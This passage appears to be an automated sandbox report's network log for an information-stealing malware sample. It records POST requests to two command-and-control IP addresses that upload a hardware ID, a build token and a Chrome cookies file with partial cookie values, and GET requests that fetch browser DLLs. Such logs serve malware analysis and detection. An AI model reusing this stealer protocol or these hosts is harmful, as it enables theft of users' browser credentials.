61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 2d 2d 0d 0a Data Ascii: ------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="hwid"8DA1DA7855D72284582127------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="build"sila------BAKFBKEHDBGHJJKFIEGD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="message"browsers------DBGHJEBKJEGHJKECAAKJ--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJEBGDAFHJEBGDGIJDHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 2d 2d 0d 0a Data Ascii: ------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="message"plugins------JJJJEBGDAFHJEBGDGIJD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="message"fplugins------JECBGCFHCFIDHIDHDGDG--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000003002&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGHost: 85.28.47.31Content-Length: 7883Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000003002&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBFIJJECGCAAAFCBGHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 2d 2d 0d 0a Data Ascii: ------JJKFBFIJJECGCAAAFCBGContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------JJKFBFIJJECGCAAAFCBGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JJKFBFIJJECGCAAAFCBGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJEGCGDGHDHIDHDGCBHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="file"------BGIJEGCGDGHDHIDHDGCB--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDHHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 2d 2d 0d 0a Data Ascii: ------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="file"------IDBAKKECAEGCAKFIIIDH--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
